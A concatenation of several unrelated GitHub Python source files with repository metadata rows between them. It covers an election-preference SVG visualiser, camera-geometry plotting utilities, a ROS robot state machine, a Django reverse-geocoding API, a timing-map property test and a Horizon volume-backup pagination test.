    out += f'<svg viewBox="0 0 {A.width:.0f} {A.width:.0f}" version="1.1" xmlns="http://www.w3.org/2000/svg">'
    # Set up <defs> section, including our triangle marker, the keyline effect and our CSS
    css = DEFAULT_CSS
    if A.css:
        css = (A.css).read()
    out += '<defs>' + \
        f'<marker id="triangle" viewBox="0 0 10 10" \
refX="1" refY="5" \
markerUnits="strokeWidth" \
markerWidth="{A.scale * 0.5}" markerHeight="{A.scale * 0.5}" \
orient="auto"> \
<path d="M 0 0 L 10 5 L 0 10 z"/> \
</marker>' + \
        """<filter id="keylineEffect" color-interpolation-filters="sRGB">
<feMorphology in="SourceGraphic" result="MORPH" operator="dilate" radius="1.5"/>
<feComponentTransfer result="KEYLINE">
<!-- invert colors -->
<feFuncR type="linear" slope="-1" intercept="1" />
<feFuncG type="linear" slope="-1" intercept="1" />
<feFuncB type="linear" slope="-1" intercept="1" />
</feComponentTransfer>
<feMerge>
<feMergeNode in="KEYLINE"/>
<feMergeNode in="SourceGraphic"/>
</feMerge>
</filter>""" + \
        f'<style type="text/css"><![CDATA[ \
{css} \
]]> \
</style>' + \
        '</defs>'
    # place a bg rect
    out += f'<rect width="{A.width:.0f}" height="{A.width:.0f}" class="bg" />'
    # place our dots
    # (sweep the blue x green grid; skip combinations exceeding 100%)
    for b in frange(A.start, (A.stop + A.step), A.step):
        for g in frange(A.start, (A.stop + A.step), A.step):
            if g + b > 1.0:
                continue
            out += construct_dot(b, g, A)
    # Draw change-of-winner lines
    out += draw_lines(A)
    # place points of interest
    if A.input:
        out += draw_pois(A)
    # draw labels saying assumptions?
    out += f'<text x="{A.width - A.scale*12:g}" y="{2*A.scale:g}" style="font-size:{A.scale:g}">{Party.RED.value[0]} to {Party.GREEN.value[0]}: {100.0*A.red_to_green:.1f}%</text>'
    out += f'<text x="{A.width - A.scale*12:g}" y="{4*A.scale:g}" style="font-size:{A.scale:g}">{Party.GREEN.value[0]} to {Party.RED.value[0]}: {100.0*A.green_to_red:.1f}%</text>'
    out += f'<text x="{A.width - A.scale*12:g}" y="{6*A.scale:g}" style="font-size:{A.scale:g}">{Party.BLUE.value[0]} to {Party.RED.value[0]}: {100.0*A.blue_to_red:.1f}%</text>'
    # Axis anchor points in pixel space.
    (x0, y0) = p2c(A.start, A.start, A)
    (x0, y100) = p2c(A.start, A.stop, A)
    (x100, y0) = p2c(A.stop, A.start, A)
    # Draw Y axis
    out += f'<path d="M {x0:g} {A.width:g} V {y100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
    out += f'<text transform="translate({(x0 - (A.offset - 1)*A.scale):g}, {A.width/2 :g}) rotate(270)" style="text-anchor:middle">{Party.GREEN.value[0]} 3CP</text>'
    for g in A.marks:
        if g > A.start and g <= (A.stop):
            (xpos, ypos) = p2c(A.start, g, A)
            out += f'<path d="M {xpos:g} {ypos:g} h {-A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
            out += f'<text y="{(ypos + A.scale/2):g}" x="{(xpos - 3*A.scale):g}" style="font-size:{A.scale:g}; text-anchor:right; text-align:middle">{g:.0%}</text>'
    # Draw X axis
    out += f'<path d="M {0:g} {y0:g} H {x100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
    out += f'<text x="{A.width/2:g}" y="{y0 + 3.5*A.scale:g}" style="text-anchor:middle">{Party.BLUE.value[0]} 3CP</text>'
    for b in A.marks:
        if b > A.start and b <= (A.stop):
            (xpos, ypos) = p2c(b, A.start, A)
            out += f'<path d="M {xpos:g} {ypos:g} v {A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
            out += f'<text x="{xpos:g}" y="{ypos + 2*A.scale:g}" style="font-size:{A.scale}; text-anchor:middle">{b:.0%}</text>'
    out += "\r\n<!-- Generated by https://abjago.net/3pp/ -->\r\n"
    out += "</svg>"
    return out
def get_args(args=None) -> argparse.Namespace:
    """Build the CLI parser and parse *args*.

    Pass args='' (or []) for defaults, or leave as None for checking argv.
    DEFAULT VALUES are set here.
    """
    # (The redundant function-local ``import argparse`` was removed — the
    # module already imports it at the top; the stray ``f`` prefixes on
    # placeholder-free option-name literals were dropped too.)
    parser = argparse.ArgumentParser(description=f"Three-Candidate-Preferred Visualiser.\
Constructs a 2D graph with {Party.BLUE.value[0]} on the X-axis, \
{Party.GREEN.value[0]} on the Y-axis, and dots shaded by winning party.\
Prints an SVG to standard output and optionally takes a CSV of points of interest.\
N.B. all numeric values should be between zero and one.")
    parser.add_argument("--green-to-red", default=0.8, type=float,
                        help=f"{Party.GREEN.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--red-to-green", default=0.8, type=float,
                        help=f"{Party.RED.value[0]}-to-{Party.GREEN.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--blue-to-red", default=0.7, type=float,
                        help=f"{Party.BLUE.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--start", default=0.2, type=float,
                        help="minimum X and Y axis value (default: %(default)g)")
    parser.add_argument("--stop", default=0.6, type=float,
                        help="maximum X and Y axis value (default: %(default)g)")
    parser.add_argument("--step", default=0.01, type=float,
                        help="precision of dots (default: %(default)g)")
    parser.add_argument('--scale', default=10, type=int,
                        help="pixels per percent (default: %(default)g)")
    parser.add_argument('--offset', default=5, type=int,
                        help="multiple of scale factor to A.offset axis by (default: %(default)g)")
    parser.add_argument("--marks", nargs='+', default=[i/10.0 for i in range(0, 10)], metavar="MARK", type=float,
                        help="place axis marks at these values (default: every 10%%)")
    parser.add_argument("--css", metavar='FILE',
                        type=argparse.FileType('r'), help="Use CSS from specified file")
    parser.add_argument(
        "--input", "-i", help="input CSV of points of interest (format: x, y, label) (pass - for standard input)")
    parser.add_argument("--output", "-o", type=argparse.FileType('w'),
                        default=sys.stdout, help="output SVG (default: standard output)")
    return (parser.parse_args(args))
def validate_args(A: argparse.Namespace) -> argparse.Namespace:
    """Sanity-check the parsed arguments in place and derive layout values.

    Clamps the step/start/stop window and the preference flows, computes the
    pixel dimensions and dot radius, then fills in the complementary flows.
    Returns the same namespace for convenience.
    """
    def bounded(value, lo, hi):
        # |value| clamped into [lo, hi]
        return max(min(abs(value), hi), lo)

    # Keep the dot pitch in a range that renders sensibly.
    A.step = bounded(A.step, 0.002, 0.05)
    # Keep the window origin usable (leave at least 10 steps below 50%).
    A.start = bounded(A.start, 0.0, 0.5 - 10*A.step)
    # If (1 - A.stop) < A.start the graph gets wonky.
    A.stop = min(abs(A.stop), 1 - A.start)
    # Pixel sizes: A.scale is pixels per percent, A.step is percent per dot.
    A.inner_width = A.scale * 100.0 * (A.stop - A.start)
    A.width = (A.offset + 1) * A.scale + \
        A.inner_width  # extra on right and top
    A.radius = 50.0 * A.scale * A.step
    # Preference flows live in [0, 1].
    for flow in ("green_to_red", "red_to_green", "blue_to_red"):
        setattr(A, flow, bounded(getattr(A, flow), 0.0, 1.0))
    # Infer the inverse flows...
    A.green_to_blue = 1.0 - A.green_to_red
    A.red_to_blue = 1.0 - A.red_to_green
    A.blue_to_green = 1.0 - A.blue_to_red
    return A
# the main show!
if __name__ == "__main__":
    try:
        # Parse, clamp/derive, then render the SVG to the chosen output.
        A = validate_args(get_args())
        # print(A, file=sys.stderr)
        print(construct_svg(A), file=A.output)
    except ValueError as e:
        # Surface bad argument / input problems without a traceback.
        print(e, file=sys.stderr)
| alexjago/3pp-visualiser | visualise_cpv.py | visualise_cpv.py | py | 22,052 | python | en | code | 0 | github-code | 36 |
12152753848 | import numpy as np
import plotly
import plotly.graph_objects as go
def normalize_cam_points(P, x, N):
    """Apply per-camera normalization matrices to cameras and image points.

    :param P: ndarray [n_cam, 3, 4], the cameras
    :param x: ndarray [n_cam, 3, n_points], homogeneous image points
    :param N: ndarray [n_cam, 3, 3], the normalization matrices
    :return: (N @ P, N @ x)
    """
    assert x.shape[1] == 3, "x must be in homographic coordinates"
    return N @ P, N @ x
def reprojection_errors(P, X, x, visible_points):
    """Per-camera, per-point reprojection error.

    Entry (i, j) holds ||x_ij - pflat(P_i @ X_j)||; entries where the point
    is not visible from the camera are np.nan.

    :param P: ndarray [n_cam, 3, 4], the cameras
    :param X: ndarray [4, n_points], homogeneous 3D points
    :param x: ndarray [n_cam, 3, n_points], the observed image points
    :param visible_points: bool ndarray [n_cam, n_points]
    :return: ndarray [n_cam, n_points] of distances (nan where invisible)
    """
    assert x.shape[1] == 3, "x must be in homographic coordinates"
    projected = P @ X
    projected = projected / projected[:, [-1], :]
    distances = np.linalg.norm(projected - x, axis=1)
    return np.where(visible_points, distances, np.nan)
def decompose_camera_matrix(P, K):
    """Split each camera into rotation R and centre t with P[i] = K_i R_i^T [I | -t_i].

    :param P: ndarray [n_cam, 3, 4], the cameras
    :param K: ndarray [n_cam, 3, 3], the calibration matrices
    :return: (R [n_cam, 3, 3], t [n_cam, 3])
    """
    extrinsics = np.linalg.inv(K) @ P            # R^T [I | -t]
    R = extrinsics[:, :, :3].transpose(0, 2, 1)  # undo the transpose
    # Camera centre: t = -R @ (R^T @ -t)
    t = np.squeeze(-R @ extrinsics[:, 0:3, 3][..., None])
    return R, t
def pflat(x):
    """Normalise homogeneous coordinates so the last entry becomes 1."""
    return x / x[-1]
def plot_cameras(P, K, X, title='reconstruction'):
    """
    Plot a 3D image of the points and cameras
    :param P: ndarray of shape [n_cam, 3, 4], the cameras
    :param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
    :param X: ndarray of shape [4, n_points], the predicted 3D points
    :param title: the name of the plot; the figure is written to
        '<title>.html' without opening a browser
    """
    # Recover per-camera orientation and centre from P = K R^T [I | -t].
    R,t = decompose_camera_matrix(P, K)
    data = []
    # Cameras: cones along R's third column (viewing axis) plus markers at
    # the camera centres, both in green.
    data.append(get_3D_quiver_trace(t, R[:, :3, 2], color='#86CE00', name='cam_learn'))
    data.append(get_3D_scater_trace(t.T, color='#86CE00', name='cam_learn', size=1))
    # 3D points in blue (drop the homogeneous row).
    data.append(get_3D_scater_trace(X[:3,:], '#3366CC', '3D points', size=0.5))
    fig = go.Figure(data=data)
    path = title+'.html'
    plotly.offline.plot(fig, filename=path, auto_open=False)
def get_3D_quiver_trace(points, directions, color='#bd1540', name=''):
    """Build a plotly Cone trace: one arrow per row of *points*/*directions*.

    Both inputs must be [n, 3] arrays; cones are anchored at their tails.
    """
    assert points.shape[1] == 3, "3d cone plot input points are not correctely shaped "
    assert len(points.shape) == 2, "3d cone plot input points are not correctely shaped "
    assert directions.shape[1] == 3, "3d cone plot input directions are not correctely shaped "
    assert len(directions.shape) == 2, "3d cone plot input directions are not correctely shaped "
    trace = go.Cone(
        name=name,
        x=points[:, 0],
        y=points[:, 1],
        z=points[:, 2],
        u=directions[:, 0],
        v=directions[:, 1],
        w=directions[:, 2],
        sizemode='absolute',
        sizeref=0.5,
        showscale=False,
        # Constant-color scale so every cone renders in *color*.
        colorscale=[[0, color], [1, color]],
        anchor="tail"
    )
    return trace
def get_3D_scater_trace(points, color, name,size=0.5):
    """Build a plotly Scatter3d marker trace from a [3, n] point array."""
    assert points.shape[0] == 3, "3d plot input points are not correctely shaped "
    assert len(points.shape) == 2, "3d plot input points are not correctely shaped "
    trace = go.Scatter3d(
        name=name,
        x=points[0, :],
        y=points[1, :],
        z=points[2, :],
        mode='markers',
        marker=dict(
            size=size,
            color=color,
        )
    )
    return trace
| antebi-itai/Weizmann | Multiple View Geometry/Assignment 5/Solution/code/utils.py | utils.py | py | 4,188 | python | en | code | 0 | github-code | 36 |
40343025798 | import rospy
import bmw_wrap as bw
import time as tm
# System's states definitions
IDLE = 0      # waiting for work; LED 1 blinks (see Master.task_solver)
MAPPING = 1   # line-following to map the course; LED 2 on
ESCAPING = 2  # line-following along the recorded path; LED 3 on
# Classes definitions
class Task:
    """
    This class keeps the task's desc. info.
    """
    # Human-readable task name, looked up in a ``task_desc`` table.
    # NOTE(review): ``task_desc`` is not defined anywhere in this module —
    # confirm it is provided elsewhere, otherwise Task() raises NameError.
    name = None
    # Numeric state identifier (IDLE / MAPPING / ESCAPING).
    ID = None

    def __init__(self, task_id):
        self.name = task_desc[task_id]
        self.ID = task_id
class Master():
    """
    This class contains all the master's node
    methods and attributes.

    Holds the robot's sensor snapshot and a stack ("pile") of Task objects;
    the task on top of the pile is the one currently executed.
    """

    # Distance value read from the ultrasonic sensor.
    distance = None
    # Voltage reading.  NOTE(review): the original doc text was a copy-paste
    # of the ultrasonic description — confirm this is the battery voltage.
    voltage = None
    # Left light sensor value read.
    left_sensor_value = None
    # Right light sensor value read.
    right_sensor_value = None
    # Left light sensor string read ('white' / 'black').
    left_sensor_string = None
    # Right light sensor string read ('white' / 'black').
    right_sensor_string = None
    # Flag that requests the mapping routine to start.
    mapping_flag = None
    # Flag that indicates when the mapping process is done.
    mapping_done = None
    # List that contains the path to be followed.
    path = None
    # Pile (stack) of tasks to be executed; the base entry is always IDLE.
    tasks_pile = None

    def __init__(self):
        self.tasks_pile = []
        self.add_task(Task(IDLE))
        self.mapping_flag = False
        self.mapping_done = False
        self.path = []

    def add_task(self, task):
        """
        This function adds a new task to the
        pile.
        """
        self.tasks_pile.append(task)

    def remove_task(self, task_index):
        """
        Remove the task at ``task_index`` from the pile, always keeping at
        least the base (IDLE) task in place.
        """
        if len(self.tasks_pile) > 1:
            self.tasks_pile.pop(task_index)

    def get_current_task(self):
        """
        This function gets the task that is
        currently being executed.
        """
        return self.tasks_pile[-1]

    def task_assigner(self):
        """
        This function checks the system's status
        and adds tasks depending.
        """
        current_task = self.get_current_task()
        # First checks if mapping flag is up
        if (self.mapping_flag == True and
                current_task.ID == IDLE):
            # Adds mapping routine to tasks pile
            self.add_task(Task(MAPPING))
        # Then checks if mapping is done
        elif (self.mapping_done == True and
                current_task.ID == IDLE):
            # Adds escaping routine
            self.add_task(Task(ESCAPING))
        # Idle mode
        else:
            pass

    def task_solver(self):
        """
        This function executes the current task,
        which is the task on the pile's top.
        """
        # Get current task
        current_task = self.get_current_task()
        # Depending on the current task, execute different commands.
        if current_task.ID == IDLE:
            # Make led 1 blink, indicating idle state.
            bw.board.Set_Led(1, 1)
            tm.sleep(0.4)
            bw.board.Set_Led(1, 0)
            tm.sleep(0.4)
            print('idle')
        elif current_task.ID == MAPPING:
            # Make led 2 blink, indicating mapping state.
            bw.board.Set_Led(2, 1)
            # Call line following routine
            self.line_following(
                self.left_sensor_string,
                self.right_sensor_string)
            bw.board.Set_Led(2, 0)
        # BUG FIX: the original compared against the undefined name
        # ``ESCAPPING`` (a NameError once this branch was reached); the
        # constant defined above is spelled ``ESCAPING``.
        elif current_task.ID == ESCAPING:
            # Make led 3 blink, indicating escaping state.
            bw.board.Set_Led(3, 1)
            # Call line following routine
            self.line_following(
                self.left_sensor_string,
                self.right_sensor_string)
            bw.board.Set_Led(3, 0)

    def run(self):
        """
        This function executes the task solver and
        assigner.
        """
        self.task_assigner()
        self.task_solver()

    def line_following(self,
                       left_sensor,
                       right_sensor):
        """
        This function takes care of the line following
        and turns execution.
        """
        # Same color read case
        if left_sensor == right_sensor:
            color = left_sensor
            # Line centered case
            if color == 'white':
                bw.set_motors_speeds(-100, 100)
            # Intersection case
            elif color == 'black':
                # Execute path instruction
                if len(self.path) > 0:
                    # NOTE(review): ``execute_move`` is not defined in this
                    # module — confirm where it comes from.
                    execute_move(self.path[0])
                # Path empty, finished trajectory
                else:
                    # NOTE(review): this clears ``mapping_done`` when the
                    # trajectory ends — confirm it should not be True.
                    self.mapping_done = False
        else:
            # Car loaded to left side: steer one way to re-centre on the line
            if left_sensor == 'white':
                bw.set_motors_speeds(-100, 65)
            # Car loaded to right side: steer the other way
            elif right_sensor == 'white':
                bw.set_motors_speeds(-65, 100)
| Conilo/BMW-Challenge | src/nodes/Master/master_module.py | master_module.py | py | 5,403 | python | en | code | 0 | github-code | 36 |
15646167981 | import os
import glob
import numpy as np
def uniform_ball(n_points, rad=1.0):
    """Sample ``n_points`` points uniformly from the solid ball of radius ``rad``.

    Inverse-CDF sampling: cos(theta) ~ U(-1, 1), phi ~ U(0, 2*pi) and
    r = rad * u**(1/3) with u ~ U(0, 1), making the density uniform in
    volume.  Returns an ndarray of shape [n_points, 3].
    """
    angle1 = np.random.uniform(-1, 1, n_points)
    angle2 = np.random.uniform(0, 1, n_points)
    radius = np.random.uniform(0, rad, n_points)
    # BUG FIX: the original took (U(0, rad))**(1/3) directly, which caps the
    # radius at rad**(1/3) instead of rad (only correct for rad == 1.0).
    # Rescale to U(0, 1) first, cube-root, then scale back up to rad.
    r = rad * (radius / rad) ** (1/3)
    theta = np.arccos(angle1)  # np.pi * angle1
    phi = 2 * np.pi * angle2
    x = r * np.sin(theta) * np.cos(phi)
    y = r * np.sin(theta) * np.sin(phi)
    z = r * np.cos(theta)
    return np.stack([x, y, z], axis=-1)
| SimonGiebenhain/NPHM | src/NPHM/data/utils.py | utils.py | py | 472 | python | en | code | 117 | github-code | 36 |
25730149556 | # -*- coding: utf-8 -*-
from django.shortcuts import render
import psycopg2
import psycopg2.extras
import json
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.http import HttpResponseBadRequest
from .dicttoxml import DictToXML
def index(request):
    """Render the landing page with the BEV data revision date.

    Answers 500 with a JSON error payload on any database problem instead
    of a traceback.
    """
    conn = None
    try:
        conn = psycopg2.connect(
            database="gis"
        )
        cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
        cursor.execute("SELECT date FROM bev_date;")
        sql_result = cursor.fetchall()
        date = sql_result[0]['date'].strftime('%d.%m.%Y')
    except Exception:
        result = {
            "status": "server_error",
            "message": "The web application was unable to connect to the database. Please inform the site " +
                       "administrator about this issue."
        }
        return HttpResponseServerError(json.dumps(result), content_type="application/json")
    finally:
        # BUG FIX: the original leaked the connection on every request;
        # always hand it back, whether the query succeeded or not.
        if conn is not None:
            conn.close()
    return render(request, context={'date': date}, template_name='index.html')
def is_float(value):
    """Return True when *value* can be parsed as a float, False otherwise."""
    try:
        float(value)
    except ValueError:
        return False
    return True
def reverse_geocode(request, format):
    """Reverse-geocode a coordinate against the BEV address table.

    GET parameters:
        lat, lon: coordinates, interpreted in the CRS given by ``epsg``.
        epsg:     spatial reference system id (default "4326").
        distance: search radius, 0..100 (default 30).
        limit:    maximum number of returned addresses, 1..10 (default 5).

    Returns the nearest addresses as JSON or XML (per ``format``), a 400
    response for invalid parameters and a 500 response on database errors.
    """
    default_distance = 30
    max_distance = 100
    default_limit = 5
    max_limit = 10
    # Get the HTTP GET parameters and use default values where it makes sense.
    # Defaults are coerced to str because the validation below uses
    # str.isdigit(); with the previous int defaults a request without these
    # parameters crashed with AttributeError.
    lat = request.GET.get("lat")
    lon = request.GET.get("lon")
    epsg = request.GET.get("epsg", "4326")
    distance = str(request.GET.get("distance", default_distance))
    limit = str(request.GET.get('limit', default_limit))
    # Try to connect
    try:
        conn = psycopg2.connect(
            database="gis"
        )
    except Exception:
        result = {
            "status": "server_error",
            "message": "The web application was unable to connect to the database. Please inform the site " +
                       "administrator about this issue."
        }
        return HttpResponseServerError(json.dumps(result), content_type="application/json")
    cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
    # Do basic data validation.
    if format not in ["json", "xml"]:
        result = {
            "status": "bad_request",
            "message": "The format must either by JSON or XML."
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not epsg.isdigit():
        result = {
            "status": "bad_request",
            "message": "The EPSG parameter must be an integer vaule."
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    epsg = int(epsg)
    # Only accept EPSG codes the PostGIS installation actually knows.
    epsg_statement = "SELECT srid from spatial_ref_sys WHERE srid=%s"
    cursor.execute(epsg_statement, (epsg,))
    epsg_result = cursor.fetchall()
    if len(epsg_result) < 1:
        result = {
            "status": "bad_request",
            "message": "EPSG %s is not supported or does not exist. Try 4326!" % epsg
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not distance.isdigit() or (int(distance) > max_distance) or (int(distance) < 0):
        result = {
            "status": "bad_request",
            "message": "The distance value must be an integer between 0 and %s." % max_distance
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not limit.isdigit() or (int(limit) > max_limit) or (int(limit) < 1):
        result = {
            "status": "bad_request",
            "message": "The limit parameter must be an integer between 1 and %s." % max_limit
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    # Get the data release date and format it.
    try:
        cursor.execute("SELECT date FROM bev_date;")
        sql_result = cursor.fetchall()
        date = sql_result[0]['date']
    except Exception:
        result = {
            "status": "server_error",
            "message": "Could not get the release date of the BEV data."
        }
        return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
    # Parameterized query: user input never ends up in the SQL string itself.
    statement = """
      select b.municipality, b.locality, b.postcode, b.street, b.house_number, b.house_name, b.address_type,
        ST_Distance(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point) as distance,
        ST_X(ST_Transform(point::geometry, %s)) as lon, ST_Y(ST_Transform(point::geometry, %s)) as lat,
        municipality_has_ambiguous_addresses
      from bev_addresses b
      where ST_DWithin(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point, %s)
      order by distance
      limit %s
    """
    try:
        cursor.execute(statement, (lon, lat, epsg, epsg, epsg, lon, lat, epsg, distance, limit,))
        sql_result = cursor.fetchall()
        # Convert the result from psycopg2.extras.RealDictRow back to a usual dict.
        dict_result = []
        for row in sql_result:
            dict_result.append(dict(row))
    except Exception:
        result = {
            "status": "server_error",
            "message": "There was a problem querying the database. Please verify that the parameters you submitted " +
                       "(especially the coordinates according to the EPSG you specified) make sense."
        }
        return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
    result = {"status": "ok",
              "copyright": u"© Österreichisches Adressregister 2017, N 23806/2017 (Stichtagsdaten vom %s)" % (
                  date.strftime('%d.%m.%Y')), "address_date": date.strftime('%Y-%m-%d'), "results": dict_result}
    return HttpResponse(get_response_content(result, format), content_type=get_content_type(format))
def get_response_content(dictionary, format):
    """Serialize ``dictionary`` as JSON or XML; any other format yields ""."""
    if format == 'xml':
        xml = DictToXML({"reverse_geocode_results": dictionary}, list_mappings={"results": "address"})
        return xml.get_string()
    if format == 'json':
        return json.dumps(dictionary)
    return ""
def get_content_type(format):
    """Map a response format name to its MIME type (text/plain fallback)."""
    mime_by_format = {'json': "application/json", 'xml': "application/xml"}
    return mime_by_format.get(format, "text/plain")
| thomaskonrad/bev-reverse-geocoder | bev_reverse_geocoder_api/views.py | views.py | py | 6,488 | python | en | code | 3 | github-code | 36 |
14551208863 | from fractions import Fraction
from hypothesis import given
from jubeatools import song
from jubeatools.formats.timemap import TimeMap
from jubeatools.testutils import strategies as jbst
from jubeatools.utils import group_by
# Hypothesis property test: timing objects (with at least one BPM change)
# and beat positions are drawn at random by the jbst strategies.
@given(jbst.timing_info(with_bpm_changes=True), jbst.beat_time())
def test_that_seconds_at_beat_works_like_the_naive_approach(
    timing: song.Timing, beat: song.BeatsTime
) -> None:
    """TimeMap must agree exactly with the straightforward reference below."""
    time_map = TimeMap.from_timing(timing)
    expected = naive_approach(timing, beat)
    actual = time_map.fractional_seconds_at(beat)
    assert actual == expected
def naive_approach(beats: song.Timing, beat: song.BeatsTime) -> Fraction:
    """Reference implementation: exact seconds elapsed at ``beat``.

    Walks backwards through the BPM events that precede ``beat`` and sums
    each segment's duration as an exact Fraction, then adds the offset of
    beat zero.  Raises ValueError for negative beats, empty timings,
    duplicate events on one beat, or a first event not on beat zero.
    """
    if beat < 0:
        raise ValueError("Can't compute seconds at negative beat")
    if not beats.events:
        raise ValueError("No BPM defined")
    # Reject timings that define more than one BPM on the same beat.
    grouped_by_time = group_by(beats.events, key=lambda e: e.time)
    for time, events in grouped_by_time.items():
        if len(events) > 1:
            raise ValueError(f"Multiple BPMs defined on beat {time} : {events}")
    sorted_events = sorted(beats.events, key=lambda e: e.time)
    first_event = sorted_events[0]
    if first_event.time != song.BeatsTime(0):
        raise ValueError("First BPM event is not on beat zero")
    # Keep only the events at or before ``beat``; an event exactly on
    # ``beat`` contributes a zero-length segment and may be dropped.
    if beat > sorted_events[-1].time:
        events_before = sorted_events
    else:
        last_index = next(i for i, e in enumerate(sorted_events) if e.time >= beat)
        events_before = sorted_events[:last_index]
    total_seconds = Fraction(0)
    current_beat = beat
    # Walk from ``beat`` back to beat zero, one BPM segment at a time:
    # each segment lasts 60 * beats / BPM seconds.
    for event in reversed(events_before):
        beats_since_previous = current_beat - event.time
        seconds_since_previous = (60 * beats_since_previous) / Fraction(event.BPM)
        total_seconds += seconds_since_previous
        current_beat = event.time
    total_seconds = total_seconds + Fraction(beats.beat_zero_offset)
    return total_seconds
| Stepland/jubeatools | jubeatools/formats/konami/eve/tests/test_timemap.py | test_timemap.py | py | 1,881 | python | en | code | 4 | github-code | 36 |
7350065420 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests import helpers
from openstack_dashboard.test.integration_tests.regions import messages
class TestVolumeBackups(helpers.TestCase):
    """Volume-backup pagination test, executed as the demo (non-admin) user."""
    # Randomized names so parallel/repeated runs do not collide.
    VOLUME_NAME = helpers.gen_random_resource_name("volume")
    VOLUME_BACKUP_NAME = helpers.gen_random_resource_name("volume_backup")
    def setUp(self):
        """Create the source volume, and register its deletion as cleanup."""
        super(TestVolumeBackups, self).setUp()
        volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
        volumes_page.create_volume(self.VOLUME_NAME)
        volumes_page.find_message_and_dismiss(messages.INFO)
        self.assertTrue(volumes_page.is_volume_status(self.VOLUME_NAME,
                                                      'Available'))
        def cleanup():
            # Runs after each test regardless of outcome (addCleanup).
            volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
            volumes_page.delete_volume(self.VOLUME_NAME)
            volumes_page.find_message_and_dismiss(messages.SUCCESS)
            self.assertTrue(volumes_page.is_volume_deleted(self.VOLUME_NAME))
        self.addCleanup(cleanup)
    def test_volume_backups_pagination(self):
        """This test checks volumes backups pagination
        Steps:
        1) Login to Horizon Dashboard
        2) Go to Project -> Compute -> Volumes -> Volumes tab, create
        volumes and 3 backups
        3) Navigate to user settings page
        4) Change 'Items Per Page' value to 1
        5) Go to Project -> Compute -> Volumes -> Volumes Snapshot tab
        or Admin -> System -> Volumes -> Volumes Snapshot tab
        (depends on user)
        6) Check that only 'Next' link is available, only one backup is
        available (and it has correct name)
        7) Click 'Next' and check that both 'Prev' and 'Next' links are
        available, only one backup is available (and it has correct name)
        8) Click 'Next' and check that only 'Prev' link is available,
        only one backup is visible (and it has correct name)
        9) Click 'Prev' and check result (should be the same as for step7)
        10) Click 'Prev' and check result (should be the same as for step6)
        11) Go to user settings page and restore 'Items Per Page'
        12) Delete created backups and volumes
        """
        volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
        count = 3
        items_per_page = 1
        backup_names = ["{0}_{1}".format(self.VOLUME_BACKUP_NAME, i) for i
                        in range(count)]
        # Create the three backups; switch back to the Volumes tab between
        # creations because creating a backup lands on the backups tab.
        for i, name in enumerate(backup_names):
            volumes_backup_page = volumes_page.create_volume_backup(
                self.VOLUME_NAME, name)
            volumes_page.find_message_and_dismiss(messages.INFO)
            self.assertTrue(
                volumes_backup_page.is_volume_backup_available(name))
            if i < count - 1:
                volumes_backup_page.switch_to_volumes_tab()
        # Backups are listed newest-first, hence the reversed name order.
        first_page_definition = {'Next': True, 'Prev': False,
                                 'Count': items_per_page,
                                 'Names': [backup_names[2]]}
        second_page_definition = {'Next': True, 'Prev': True,
                                  'Count': items_per_page,
                                  'Names': [backup_names[1]]}
        third_page_definition = {'Next': False, 'Prev': True,
                                 'Count': items_per_page,
                                 'Names': [backup_names[0]]}
        settings_page = self.home_pg.go_to_settings_usersettingspage()
        settings_page.change_pagesize(items_per_page)
        settings_page.find_message_and_dismiss(messages.SUCCESS)
        volumes_backup_page = self.home_pg \
            .go_to_compute_volumes_volumebackupspage()
        # Walk forward through all three pages, then back again.
        volumes_backup_page.volumebackups_table.assert_definition(
            first_page_definition)
        volumes_backup_page.volumebackups_table.turn_next_page()
        volumes_backup_page.volumebackups_table.assert_definition(
            second_page_definition)
        volumes_backup_page.volumebackups_table.turn_next_page()
        volumes_backup_page.volumebackups_table.assert_definition(
            third_page_definition)
        volumes_backup_page.volumebackups_table.turn_prev_page()
        volumes_backup_page.volumebackups_table.assert_definition(
            second_page_definition)
        volumes_backup_page.volumebackups_table.turn_prev_page()
        volumes_backup_page.volumebackups_table.assert_definition(
            first_page_definition)
        # Restore the default page size before tearing down.
        settings_page = self.home_pg.go_to_settings_usersettingspage()
        settings_page.change_pagesize()
        settings_page.find_message_and_dismiss(messages.SUCCESS)
        volumes_backup_page = self.home_pg \
            .go_to_compute_volumes_volumebackupspage()
        volumes_backup_page.delete_volume_backups(backup_names)
        volumes_backup_page.find_message_and_dismiss(messages.SUCCESS)
        for name in backup_names:
            # NOTE(review): the return value is discarded here — this check
            # probably should be wrapped in assertTrue; confirm intent.
            volumes_backup_page.is_volume_backup_deleted(name)
class TestAdminVolumeBackups(helpers.AdminTestCase, TestVolumeBackups):
    """Same pagination scenario, run with admin credentials.

    Fresh random names shadow the base-class ones so the demo and admin
